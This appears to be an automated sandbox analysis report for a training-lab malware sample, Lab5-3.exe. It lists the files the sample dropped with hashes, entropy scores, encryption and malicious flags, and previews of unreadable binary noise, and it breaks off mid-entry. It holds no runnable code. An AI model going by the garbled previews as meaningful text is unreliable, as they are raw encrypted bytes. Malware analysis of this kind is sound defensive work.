                                                                                                          Preview:...F.A))S..]~.R<....a7.k.w..X..&..D...=R..T....5qm0..U...:.gr..Tf.p.]u.b....x..B.\.{.tkG.Mh..d=~..b2..._.s.*.ZC...'.s.V;.0T...,|_.q.\u.^...}..%;f..Q8...='u..*...M.[T... ..H..D .o..l.ee0.c....!......6q.J.^..&..L>V.;...d..P.!:..F.....mUr....2.ay.l.?s;.B?.^*....m..J'........KX...j..Z........yu.......}...m..ux...2?.m2nz..."?....=..qp.F..:9..`....z..d..4|.d..H.W...3.c..CC.c.+Ty.&7.Q.lI...../.M.%X....w.....5..8...+...cK.)#.}.T...?......t+.:...&..A....hT+\..~..).qkP..:.S.XLK.R..W&P.W.j...F....\P2..v.<..W.I......o.tr..f.0.Jl......i.,.......H..-."..s. ..f,..qrC....#....d....U.{)...U....../.....b.\ ..6.......@....'..3F..0...W..E..rS.L...H...d|C...u...$....{..0...a.....+.R.\.E..Z.W.K._.+.J.....-..C..4.WI.,ud.,F.N@.U(..v5n.3V....K.*...I.+M.hJ.......|...K..9.)L.6.<..P.3pP{<Q<V6..9.K...$...........1......:...y..y......w...y..]f..- .. AB.....1.q.1.@+..i......i.]X...4l.....4...J.cb...C#n....W.fK.......zl:.Iby.B..".h&.Z....u..7p..z.ax..>.=.y.FE
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:OpenPGP Secret Key
                                                                                                          Category:dropped
                                                                                                          Size (bytes):38576
                                                                                                          Entropy (8bit):7.995074833203147
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:eZ7g4dHdu5Nlqwkpz9nMWpgPfOm5pyYzLO6UDaE5o1Xtd4IkfZ:Id9u532ZVi2mKYLUDg9d4I+Z
                                                                                                          MD5:30C153DC0AA356C204DB39E4DE20CD11
                                                                                                          SHA1:1F50505D84CACEE4BBE7D87DD5234FEDF1058041
                                                                                                          SHA-256:7FDE81E584D09FD102DDB8C229073057F56373ED86812E2B9202D2FEFFA62F36
                                                                                                          SHA-512:0524A3E1342F1C4B5D03D720EBDEF5CEBE07EFBFA0FB868320A9F640D98A38D8013F579174445539797393E0A05C358228317C9584B4ADCFD2D265B454EE0583
                                                                                                          Malicious:true
                                                                                                          Preview:.. zoq.(....fXm...-QI...(DxXh......-y9........<a.o..........-...B.M.-SPy7...JI...c!#]_..>.... {....gk;..eY..&....k..!9.........f0........p7.mA.A.:OfG..{...&..b5..7.s.WV...k..)..<.'......l/..ol.@P....l...~q2....\.g..j.B.g~.,...%Jb.}R..x..O.VE!2U1.-%thR..L.Mtt...K....l...{....\..].S!.Ep.....O.............3....b.f)..',.........>.h.a..aH..4............'..9!.y.:B.P..t.v......P......n.?.)'.`..eC...^!..,...*;Z.%DpH....tI......8..a.2.&.!...@..:p)M.......]..2.?`d#Du.I.U...4.R....*W.."NP.....$(......jc.L....[4.Y.6m.c......v..\O.......L. .y.W..O.....p.Z..8..JG..B1. .a.0M...x....d...G..>.....c...).?.$l.T..S..%.vi.o.?kf9F...=...O ..v.n..b....$I..1...........)......=......^^A.C......?...E=X..}x.^.GV>..)./.*....6..g........q<@..v...9eO.B^.......:...R1.Bp..o,..d.R..)...h.p.E{[x#..5qq.ri6.Ci.g.....l. ...t..r...|..H.J.".;..f.....M.......@.#.....\........}t...u.y..f].z&^,..@......Q.*.8..v../b....RT"...=N.a..c..6e.h...5$U&#........YT60j..%.F..E0...S..'s...Eh.s
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):38576
                                                                                                          Entropy (8bit):7.995028776904799
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:oXgNKJh+u6qdtH+qF8tALmjgMINVVevtzwk8oZZ:acI5HVFkALmcNfeFzwk8oZZ
                                                                                                          MD5:00C902DEFE40C8486181866FF84479E3
                                                                                                          SHA1:B2DD4F4A3FB47C798326FCB0F6F5212DC0A5B539
                                                                                                          SHA-256:397AD659EDBCD878881918738B99EDED8D99872B3F6CF81222D8DAF6D7D823FD
                                                                                                          SHA-512:8B2E52BCFA6F9FC283138AACF73F5A1EE4544D2A6AA03F13B818297D6CB64B5A6157E8A74343220E5461089CBF66935222C7C6650BD3D7E6A1933E545D4661F2
                                                                                                          Malicious:true
                                                                                                          Preview:e.....mh..4yw.O||h...n............|.<.........Z..,.3....J]...w.HD[s....u...5N#_.//f.R.....I...x..6.....X...1P.M..NL..H.re..y..e.r..<..u!...[X..`..O7-wP..e.A..a.....FC.$Bk..J.8..........1..g..R.*wH.^f.Ksv0...a?....1.{.C. .d.........T......<........A.RR.]MN[...8CW..;.V.*EK,Dv.s.ne.....Sz)..ht...(e_..c....g9.].......&.?...Oy..s.)....cB.e.p}.w.......x..z.....V.].L.T...\/..E,.....A..K.....A.KDG#/P.;..?...?s....Ex..4.1k...w9.(.\......x.....u...o..d..o..cJ.....A.N.b..a}.$...N...!.j..A......./.aAK...E.,t.......!.W.UwU1....E....,..............P}.<.D4O2......lf5f.P(E;.*.BQ.Vj.M<.=...zi(H.F1.aq...e..@..$..~.. ,.3.d.....p....=+.....~^..'..+q.....sQL.8.x/..LFRg.f..*.1..ly..4....@+3.S/.}.*VF^Wb.8:...Vz@Y3..L....yX.~W..=.@..~.1y....&d.Nq....f*..%4E..PB....f.V....{#,n.v...)\g...vE.p..$......=T..B.Vn.RD..qBJ..63.o..Rb"&.w..o|......2.+.x.X.S...>..EY..4`....Q.L...{U..A8.R.9....@9nK...?'.=L.ji.|[q.O............B....Y~..T...Q....d.:sDm.K,..(./.*.OJ^=.4.N.....^
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):38576
                                                                                                          Entropy (8bit):7.994717316347228
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:WaqLiPh6L2+hpnW8UkDkq+QQL1jrBSQ7rLUa14YioioCzXZ:uah6KsnITbxl53VJizzXZ
                                                                                                          MD5:5407434D9F859B9DE61E26EE6E16597A
                                                                                                          SHA1:2769301B59D28B08D5F6C3C8BE474F45C090AEF0
                                                                                                          SHA-256:901890E1D8AF998C39243E8A5B81F91C249EE8A63D8843269B7AC5D67DB5EA37
                                                                                                          SHA-512:A68CB4290FE4568CDB25742A6CEF8FAF8AD930AECCE8CE172964FD36A265E519789DAC5A34C7083C4E205B57E3244BEEF2B6F3AF476E7D519C3B69B69EEE86BF
                                                                                                          Malicious:true
                                                                                                          Preview:7Rb.....&ANk.....9lA ^...&.Pwd.l.D...r;v~t..s...Z...7..D&.RQ...D.x;.D3.;.....+..h..tp.*wJ0A./.^.../..\<....F9,+'....].V4[b....N~im..c...;..>3.gRy.D..6l.m.,.Z....H......A..2.nH.. .<.T!.$.e.m^.E.jk....]c...M.e...I..l..X.O.XS...Ps.nS]W.zf.'.N.S.G......9E..@....7.c^.....!.9e..#:].../..x..7...+.<3b.5.....%.}..*Y...r.pfm.A.I.iO..........$.....t...>.QF8......l.V...f1.l.-...k.=_..B.B=.Jh.7.$...he..=.z.......d.g.I...1|.....@|.P...+>....h.. .....,...M..>;._E....O/w..*a.`.6Xy#?`.K*.}...w.Dab..7.2.!/..vX.&..i?8.F..\.......`...g$...3......4(..|C.>&MY.h.za69..'\...?0.A...,....U...........yZ."5.....E......M....|.,.U._...%c$...x.ZR....=.9...)..4......h.....S..YX.s...n...n./...........u...D.'..jI....z._....x.t:.M...:..al{...6tc-..8....o..1L.gL8..7..a.sf.(.f...]...h.7.......%..:V.es...($..|#b..$Z.n.....?e.......Q....@..B.....J.5.R.*....e..V..I.1m.A...K.,o.<....b.......3....YD..4)...z....-.#.....H.Z2...i38n..ax6,U.'n.k...VZW.M5C-.".j2...;.l....|F.7Q%.#'
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):38576
                                                                                                          Entropy (8bit):7.995692386867349
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:TRK3mpIG9oQYdjyFxH2h6s8wLN83tEXvnnp44wuG4JzZc04MgZ:Nhp5KFT7Hu3t+C4wMFZcBVZ
                                                                                                          MD5:1BBAC9837B9247B948E8A97281A4D8CB
                                                                                                          SHA1:BA7DBF40643B8D3AA2B2C8E956AE3F9073980CF1
                                                                                                          SHA-256:A3EA8BF6113279490CD5E6D2290BE592F5B1801075B3AB1354FB9B2AA28AA9A4
                                                                                                          SHA-512:D1D6B2D2C746AF9CDFBEC7A5286E7521EB147B76D103C9119AD548AD37C20F984010A6111076A1F620DBDF1029F92E1AA1B72002794960F257F4925ACC63FF62
                                                                                                          Malicious:true
                                                                                                          Preview:E...,.{...T8....5Z....]k"..W......9....].;1.Ko8....<s....BG..o!....yB+.eX.......B`.1_..]...s.......u....7.....~...-...x..<B.Z..I...!W..p.....E.jW.F...:P.......G.F.......!U..7...2..y....h...j8......H..a...!..&.\.P.v......A..../....tz.....).*..+.:.h.....-ANe..$..g.....j....F ..l.....y.{.....13.i.Q,......U.#.4.?BJQ....y..lj.Vt{+.'\.8)"...V.......qE{.LaA..4..?...c...q.L.d.P+Z..}.jxU...!..t...[..G...kB..o...Y4....1<....8.<R.b.,4v0..0..C.>...b.l.......>..~..R/:..Y.c.Y.B6J,.5B....@..?../7...T.....1.j...6....6.V.../.7g."..25|..#...w..........q"..P5....E...d..c.T.P..*......x. ~i3..8.....r....y"".bh.L.....k........Ba..VF.H.p_;.lU.U]...pZQ...........7...e..S.VB.:............(..O.J.j*.I.=.%....<....a....]...^.[..X...;H...{<.Z..c.Vr/x......@l..*..T..b.g......!...O..u...^5.].y........^....J........G&X_..l<.#..~uN.o........Wu.l.,k.....(...w.2Pp.....m.e.3.ct.J!^......i36.)Rm..S..y._sN.c]^l..%...Yc...uj.$.....o3....]d'Z...O.l.\4..D.$....C..m.x
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):38576
                                                                                                          Entropy (8bit):7.994964149128083
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:reMtIzVNZWrPmCAwOe2pPG4NRNhPmKpyvCUXaHaeiwRw23R/3xZ:3IBNZTcOe2pPGsNhFyvCqa9i3O3xZ
                                                                                                          MD5:6E8716457ABD8A089EE5771D47DD77D8
                                                                                                          SHA1:3565F53D2B8C3EF89A614F7E757F5A458369D7EB
                                                                                                          SHA-256:559DEB31177DF9A09EE05E5D2D5AD7207009376B8497DA9894A6E486C8D0EAB5
                                                                                                          SHA-512:85F964B06C693C18406BD6B1CE896C2613E782EDF117D225883DC7611A2CA41EF0379CF1F349753B6E7659EC3A7B931FBD025995158067ED5E0646A7FB58070A
                                                                                                          Malicious:true
                                                                                                          Preview:.A..P..-.o.......,L......`..z...D=....}sh...\.........y.s.i.f.|.I.s.... ..8.5|..)_X...6.....T..E...L[#..qG..|..U.....l..q...:MHE....d.c.O.$..m..../..q0..#.dw.:At$..v,....s....9....D(.ct._..N .1..N...Hh.a%D.'..*.l.n....&64(.;.W......w....z~...H.;.F..di.E..X........k..}..Cw...u.O....\.o..t.....3...W.H.H.cnI...'9..b%......j.+S8..+..W~.-.!..7N. .NSh...........q..`./..o.;Z+..E.....I..J.X.(|.....;......{...A..Y.......1..f..(w......;.u...,)w..s."...[Z...3.'.o..Q...".W.+.q8p.....6.It.g.....S..)h.,.,.F.....R..v...b....L.=Q.!.Z..._=.x7..!........:.(...'..P.tk..e...{.N.f...a...QpH....a..G6..t.Xg.>...}......\..../.Dd....3...L6c..c.P..^.`wS.Q.P.#.]o....-.....V.~! ....|,r....*..7..v.qu......P.O..Z;=M...z.$..5.......w.S.M.d.39..#.....RK....0.OM;..$+-.......7.|...+....|C....|s......n*..\....s.W....O...N.@`T.Z.5A~.%-."..G...-}h......$....)...rq!s.c...)b..l...,.8JM-...{......6%..P.45...\.#.+...h...T...@...)...Ob.2H.)...y.9N...{...K..c.9..../.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):9456
                                                                                                          Entropy (8bit):7.980501500441183
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:aiBodGdSP8nm2Ap8leHK9Pp2JYX5+ykqH35lKTiSjfNcU0Cb:Zodcrnm2Ap8pR2JyMyVHJlDa1cUtb
                                                                                                          MD5:01AF065EA28319370F31F4C08BFFB39F
                                                                                                          SHA1:177B0FDDB79104D3CC69D18D1A5B852615D64BCE
                                                                                                          SHA-256:C79B6BD78B46717A05F4CE6EC5E2D98330E618F69B4524FA68F07D831B7425FA
                                                                                                          SHA-512:E9F45275DA62DF150D86111640079D2030BFD79731720A17F7DAE9F376F2D64D0FEC31999FF65BC25186E72D5AB9395744453684CBDFAA859E569CBE06C5C72F
                                                                                                          Malicious:false
                                                                                                          Preview:B)..>JX.."..X.z.,c..j9..bqj. ....]...j.n.wS*.ug5.w....0J.,..+z.......!o]..G.....-Q..."..e..~...;5..U .C....K2.......H.8..I....'..TJ(d....d.w.R/.$...".....`\y.Sap....N..b....(...S..m......3..{K.r....].Xdr.."0.T....,f.;?.....3...fb...b<......E.K.....e.Q.N.W.gr.w....Q..m.n.ry."....N...~h.....}...y.)........@voLH....S..(,z.T...AL<.9.M...................nx...Z8...a..V?....1hP.? c.|.E.*.8..S,4 *...U.l.n..zp@..]j.E<|y e.i........`......:;c.L17LY...G....c.m.0.......7.....L.`c....yy.... =l^D.A.~:6C5X..*......T#....;..m.l.....rK.&..T.ST.......]e.n>`.)._Cm.G......kB..^.QZD..9..G.k......... r..'..9[.. .U'T}[..G......z...?..D...q.'Ig$:..Fv.Z{....1@..!...N....CQ..b$..NA6.....jX.2@.OJo.f..c.)D./.l6G....L.......7.H.8?.*"_...^..D.n.EuDgl........J..._..;..,....g...3/....h.....q..5.4..e.qN..bj.>....]DX.X.hje.?N...*.f....5h...g..m../.8........_w..L..i./..n.].vZ...b.|...&.J.4..........8..dH...JQC..%.G.P...o....>.-.W.[,..G2}+/tc......,]........e.(jI
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):9456
                                                                                                          Entropy (8bit):7.9802038365978145
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:oQ6OmaqgdluJahy72PqW5xVqFimY1/U4bcIJJez20Cb:oQxm9gz4VsxVqFil184AIJJltb
                                                                                                          MD5:F98C975225E607DEE4F904087E4DF58D
                                                                                                          SHA1:79D6FA12240270FAEDB0862115A62D58BB76F736
                                                                                                          SHA-256:82B0E709272173B3DFA486AF29F0FAF533F9D5F996A9C45E5AE24F6031BE7A33
                                                                                                          SHA-512:5E83D9078948B898E3AD510C9BAB64C9542D8403158F71EAE01B268A1B5996E4C8DEC15E1AFFE43C2CFCD2296DBDDE9BC88580C4CF4F9B6EE8F1B8C5348C141E
                                                                                                          Malicious:false
                                                                                                          Preview:..m]\v.]6U..1....=]............P..x...~.#.~......*.....|.....TS,)..<......Hm.$.6>..a..}R...U@....E.@..fLk ....A..<s...[.{..w.Y......WW.dr.L_m...|SeK%..~.n.....,S2...4...9).%......Z..?...;...#....R.............{3v.'&c4x...b............#...t.3.....X.2I-...;...../...b.-.m}3.oG..4i.#.'......"R.....i.....{.+;#_...#........M...u.D......GCACL.X6....O.....?..s..~-.[........}.........|..B.!...2.\.9.........m......&w .%.....kL...~.....c....32nr.Dj..N._.>*]B.V...].%@...zlI.O.851...u......._..B..B.....W...D.....|..<.......W+i.N.J.5..G...TpF9`..j...x..>.mP...Q.....%.D..&.QU.?y.!.>.[x.*..F..A+cf...[..e21....3u..c..........T.0.!t............B.@r.....Dh..W..O.w.z... un..a-...6.K.ET(+v.._.A..n.X..m.SC25.E-.E........&\..l.$....w............c..dg.G......%..X....1..i....EO...0..@hF.|...G0...:.\'.e...9M.......%........_..0r5.v*...#...olx.w{7.I,.o.Fp..=..).D....5.5.Th..cv%?.<G........*..9....K....Q..?.......@\..7.{..-...4.l..x+\.Ax. ......@q.Ef.p.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):38576
                                                                                                          Entropy (8bit):7.9957729059553975
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:9viyA3idz7NUjek1ieg52ga86EobgAYjbmyuwiZPzkjg9Z:9v/UidziekIe2aFgAYjTUZPz99Z
                                                                                                          MD5:75C2A9181DB9C40B9BF5CBB058C8221D
                                                                                                          SHA1:ABA55ADAD56BA0CAD4D3AA05DD6ADF5E9BFB11F4
                                                                                                          SHA-256:A052632932BBE1D6BF1A39A60234302BFBD49EC76243A5D4D6753C64E96C000E
                                                                                                          SHA-512:F5F45A1BCF04DA3019C6C3AB822E1E96E5A4050990620AF55AABBDAEC7A4FEAA7E87D00C9EC0B99B2EA445E52D0C051188E53DF422BEA4E3DC3D37AA534169DD
                                                                                                          Malicious:true
                                                                                                          Preview:..........y...p ..-i...O.....C..d..9.V.8]..l..\...N._+t....\Ag...bE..A.#..ecE_c.%....C.0^3..QJ......\.=...U}...P........IG.q..p.|....,..J.I.4*.!.......R..U|H..i).......a.Um...];..G.P.\...Fh#....h..F.YW..WX]...~ S.S.v......h.7..[.....6..d$....N1...b...I7.....*....P.JG..e...<.>=..5..... U.B.\,..`..o...z5c.t..G....f.%........iKL!..~R7...f.Ig.{.s..b3.y......'gOfk...4..(Bs}.m.T.......]....[...U....\..r...6.z...=R.Il.... ..w.^.....gik,...i.P..!{..M=.."+bj....T....+.:..M......m^t#s......Hm..\X!...zB..K...|..*....v....M...]8.P|...9V..I.<.ZN..`.E..cqM.N.$.*.........S=.e...'3J=..y...</.5%....ji. ...mLCe.[........".1...H...r....F{I.....g.......PE..^...$w...c..{........%...C.qJ...l...+B......{..2..x..z^.........kB`xY.1..Ex@.=v...1]K...,.N......1l.f.=....i........Q.......($.......vG.0.@....py...T.y...0V.`F-..%F.++!..&......e]..!.S......f7.!..Oi.2.........=.d.If.R.}.M@....d...O.p.l.7X.....JP..V.E6.v...<.@...i.0W4..j.p`b..3....uZ..L.....-..Z...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):9456
                                                                                                          Entropy (8bit):7.979874316113993
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:S8BEqEfIcnqsv1YJ1yEjtibs0lHhle/8q5+lhcuqr7GZw0Cb:JoAmqsvuTgjBlU8q5+Y6Zwtb
                                                                                                          MD5:F7C13129FF0E629A112DF1ADA8BB5139
                                                                                                          SHA1:6626A307BE1F6870287E1B87257A0A77B6FDC22C
                                                                                                          SHA-256:ACA6CADC4B6A6A6C62B9B0CA29A66183EF82A2A85CDF8BD3135676E7393C74E0
                                                                                                          SHA-512:14B78EA8DC62F275A10BD96B35EC0A829D2ED749B3AAE99A90F281F48BB20FDBF778BF42CF891C97BA1D65E1D204D0631944DC0675422196DE8B2F02217E05F3
                                                                                                          Malicious:false
                                                                                                          Preview:.X.b.W.x*..V/..S..^.DB."l...F#...WPc..'..B.`<B.5.......N..e.....K...n....P...m..E.x..b)...."...G?..I.<.c.x.V..,.ux..JPT...F4._...3.kF.....a..I........f#Q..N../...z..*..s.7KV...n..t..Z.WG..,rd.O..2z._Y..9....o.f.y.......h.Z.n..<..J..k.....`..b.!....M.C..z._l.u.j..5.M..V..R..Q.\K...8....>...{..r.[.....1.(.K.$.....F(.=..c`....(b.s.=..J............,....a2d...M..K /.w..Z.2....F...._...j.sc../.Q..@_.....X<.'.F...m_C1*)2.W....Q.J.!...s..3.E(..}y.Z..^....MUe.\C......:~K.4....z32x.:.#.....(. |iq:.nTRN........W.{........J2.........%......-..p.....FW..Iz7w`\<...\@..&(.g.2....D.6.. ....w?.-....6..m.e`,b.)...D.l..x...E#....{...,w.......y.`....X'.......6Y....a..0.=1..'H..N+`..V)..3K.......1...k.....wt.'.sy.q..Q..?j#....7@ZH.W.%.fU.......n..s.7<d...v.t.rr...k.Wj.:...A.Aq..b.~\.P.X....l.......L..K...).eD...e.......B...X.)v...5O}..h....UIl+!5.3.6..x...X..U.[.Z.4}...@g!/....:v.2.2Q4.t...~p...n.A.(=Nv`Y........4.G.....J% .l....@..<...S..3.R.mQ.fj.....9.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):9456
                                                                                                          Entropy (8bit):7.9810540161140775
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:S3lrWkgQsJoDzNo5bvwJ2AOhcpXo2pOGb0Cb:Elrlgf5TxxhcpXo23btb
                                                                                                          MD5:3872275E689D408779D9A3E8F70F3CC7
                                                                                                          SHA1:21CEDCD5C45796D6924B8E679BD4FE1E4E130403
                                                                                                          SHA-256:E3B4449A9259642739326FFE797375CADAEA8C2C43CF033F9E0CA363DBE1FE4E
                                                                                                          SHA-512:AC46FB37423008336F47CD8F0D9F8E43B9BAB2D0FA2427329C31FD65FE870309559C6C155590AE21DA38ECCC384771CA9BD1B20727DCCD88B50E05F6D73AC6E3
                                                                                                          Malicious:false
                                                                                                          Preview:...6.p..3.#.....Q............Ao`)7.)5_..X.c*Y.%....[..2z.p....S.@)...P.Kz.....P:...X.,w.!:.H\m:.f..M. .JJ.v...n<..O...{.#..s2..i...'.NN.e.:...(..N\...k.J.~....1._..."h1..j.2...|.Q..6sD..h.C....\...sd......l../.]..%0.H....4.m.Y.,.Hz^...;...A....<.......s..ari......Y5..v.5D.o.l.L,.......J...P.r....."i.~..S.?.n(".q..d.....m.;._...D..R^u.b...F..VU..D..0Wi].*..i......hq*.\(.}..`.s..Q.9.`E=.....X.Sk..k.Zh.3..q./..j..DM[..q.c.....U.UO@..h3..}&....D..'ip.....i}f..."....tD]..S........?...~.*J(._.*...q...c.C..6..).}c...q..~..[....|.Zf...4..3.E.f...S.S+.%h.......Q....XwZTHZ'....r....;.d..i.".q.......6....gW.Ok.9.N...G.....;...c.. ..aK.!p...A.J._..8....q.8.EO.F..\q...]...8.AaQ...Z+..^.^..[.1(..c....Y9....5Z...;.....<_..Ts..x.c.....x|.^f..^X.9.7.....Z.nz..8.....t..0.6.......a.@.6...s.f.A.....~>P1./....O...#..x).Lm ..g.)c*8L..|...W.i:/n.fw"...6..&.x.t...F."C.W...K...'...6.%..RS..OS.!...#p.u....x.+..a.`.;8. .......:........P..zlEL....!HZ.0q6].6...p.So...5....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):9456
                                                                                                          Entropy (8bit):7.980077838428996
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:AsOGrTG3APy/E0xhdHAtpoCz8MI3l1DcSzl2JyIP0Cb:Avh3Myrh55CwMI3LTB2JBtb
                                                                                                          MD5:53E65060D414CC361D3AA9BD0B25C22F
                                                                                                          SHA1:2F280EC881497E30F043C66C527914D6AC071194
                                                                                                          SHA-256:2BDD4CFDB6615BC06FB7CB5166D6BF3DEEF5D0F28A1658F1BD22FA8736923434
                                                                                                          SHA-512:778734A3B347B6094DB7CD325505A1AC89C646B442A6D9EC7A4DB70D38666816A1B1012D1D3106E80AB97B80C1F74A83B78AC39A5E22EE3720A4CF82EEA33162
                                                                                                          Malicious:false
                                                                                                          Preview:t..FB$..v.G.s5^..%.T.tR..d.m.@..;...LWRc..._`]..<C.x...F.[.B:...f1L..w..|..O`.^...z..>..H.T.MA...R:E<.t..=.n,D..B.JF....+..'..e!0ls...X..'...#8..&W.=*uK.."S.Qv....nPK..\'9..^.b..lKTl>'e...#.l.}P.+M...D.ow..&j<0...^."4.C...rF....d.N......].E..h.x..T;W%x...;g..3Apwy)....7...p.:[....H.q......6Mm..B..m..........*..c4...9sE....;1.....1...V..7%bMG.@.. .P<..>&EB...:".\}.wV.......a.z.M:.)OjpU....)q|{v....jg0.0Q...ll..x_.s..GX"I=..uM.V.....N..\...e.."..^)A.}.....d+.9./>F..)..#7RS...........wX>.)......S./DV..r.....ICz.*.I.>d.....~}K..I..q..@..l...i.h>H_K...8N.1`....#.h..S..{.[.W#...|h.>.|..0.m..2.}..F$.Jt,..R.vS......d.....=..W.*p.%T..uv.o%..J..F..DSX... ...*(B.FRi..D....LA....J...O|.1..;6vGs.no.L....v.D.o?ifn[x^. .......7Y.8np\e..s...Z.....*.(.7.0....O........V.z...A$.....i...!O...4.U......F.tG.|.e.i|)..i.hK.....S..p.!)$@....@g...q.Z{P.._..G.*..>.....}1.ZBa.a....\ ...f:.h...A.%...R..f...Y..............Jq..`......'2.*e6~....=c..M..f....h........\.%#<
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):38576
                                                                                                          Entropy (8bit):7.9956614085125635
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:oZiTWHY5GKF6EkbifL41Yhjf71pe2WOSP3wrZ4k8kj5mq6Zg3LgTyoI6Z:lTw69+RkjJpeMSP38m51TyodZ
                                                                                                          MD5:6A10918F41F7E1A5F216DCCFF4EAB65F
                                                                                                          SHA1:5704249645CB0B60E0648F9E2E9E7A08ED7633AB
                                                                                                          SHA-256:1422383E34DED7FB8E00FF7E8AD77CBD4778143817943C1C3C089695D64AEFDA
                                                                                                          SHA-512:6714FF10C3911BB42E09A019B9F5A878C14DEE0A681717BBCBE9179A424A3EC0650780193445A6B5157AFA82FE451E935F0CBEA94B73B8CF66DA1CDB83738685
                                                                                                          Malicious:true
                                                                                                          Preview:l...O..h.....=.yK.%.<9~..u..V3.`b.d....Y...........r...5L..J.-3.p.L..{.....(d...X|.m..z...........J.........!....i<V..y.c3%.|..%............b...^A}.,iP,&.?n..DQ.i.tx,.B...7.=F.BT...N...0.Jf.@........%.*:3.T.......E.1x.3....../.5.PD!.x..........+..X.7.M......x......o.?.q..B..".h2...Y.G...)....B....CL.E....y.D.....Q}.. zq.....-...|.X2..E.......:....A.$'.:d#......P.x.........V....c..D.3.......5...VO.?........(.aS...?.E..a.j.4...D..C`...!.i#2?.~.....X]N....{.....>...a.&s.x-b..........&PW...._R.{.`.".5.......}.x.a!....C........,.P.].kywU.2...RQ.^...z..j..NQ..-3...:g+f.n...T..B.(....!...8..3...N..0.<..x.v....f5..:..Q^s.Rs].%_..[)._~..dz.D.`Yw...vsmmF..Z.P...d.........IS..T."<..........W.B..iiF1Tc....EC..a.W......L........u"9^h.....|.ch.F..t.!.i..H..Y........p.....:pu5..gp).nm6{..Q3t.M.F<.......F{....F..O.Q.......4/.}...A.-....U.N0h.......7..O...u.N....d.P....gt+.n.....@C..X..7.....F~.....E..........8.f.:$......^..)k[3..@&<.z........N[A}..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):38576
                                                                                                          Entropy (8bit):7.9946398587149545
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:XybpLw5IbmcUv2uN/AOOOFNPElBsIDkH/srt+ARUe7ehRZ:Xk5mxbYOOO/kpg3A2Ee7Z
                                                                                                          MD5:727E0F8D6EEA8E00EA00C417BD082FA4
                                                                                                          SHA1:35A9CC2A008BCEACD5E3B2EFCAAD987967E81167
                                                                                                          SHA-256:213A73838182F293F9472E3A007F7CB92B61A5D1910651B4AE72A1ACF79C5A0D
                                                                                                          SHA-512:9942C280268980E3F79EF81DDACBD22290AA6340A82D0FB2A03C0D1E11A274EC4D3706F1355619A23EA72E2D0D1DA5CE2AEFFDCDA0E7AFBEF41C39454D9BC8B2
                                                                                                          Malicious:true
                                                                                                          Preview:.Rg....]U.!.6. ..Y`.v..G.j9..9D...p..........k.(..............!?8.oWs'...t=?.gF.....:.....?...7.B{...HM6.R.%..>D...i.0t.b|D...\.!...D!u.....L*...I....%V...(.`+..h0C#.U.-.."....^).......KU]s]4h../d....e....A../[....J ..DQ.7...k..;.Z.a.2!.....?_..-.....>.'4....n..7y...os-.HJu....~vv..u...C....p ...".....z[o..W.vJ..Md..X.)..27lG3Ol.d....lIzOX....g..3;h.:S..wuK...>G.c.U?I.fK..&.........7~..A.m$.....P...axB.P*..:.o..6......].6..F..U\.h.nJ-..L.....+Kq..t...Qg.:5.&.ED$d..H.G..#.U....\m..op.n.....\...l........t...b.6..D5Y.PP...YU...P.....`...r(Tz..".fT..'3E'[....q.k-...E.g%....S.i.h5....Y.q.#4.z.".@KUc.T....3`.......#.!....{^...<..u.....F0%I.e7.1.Hw.g.AJ.b`..91.(p.6N..JX. ....f.....$D.h...cv.ZI.n{y...@...CR....a.......D..d.....D..'....u\4..".^..|..L..agRWO.,...K..o.e.O.4N,....0..w.K.`i:9T.....}.........o.?.b.`....9W...`}0.....j...{. 9..'...._'V.P..[".==...3.<Z.0...w...,.P...B.D.8.|.'..s!..Gig.`.7.p.I.x0.W"v%x.X.2.+o.c....)..A.A.B
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):38576
                                                                                                          Entropy (8bit):7.995636219279795
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:bee/FuiDEWN1FqcDbp4IXgwmszugWToHDOFezWp0lGWPQ4DhQB35xgybZ:b1/YaEWxPpbgNzloHdy08j35SoZ
                                                                                                          MD5:4CDB1E19B16D624ED8D6BE377A67342B
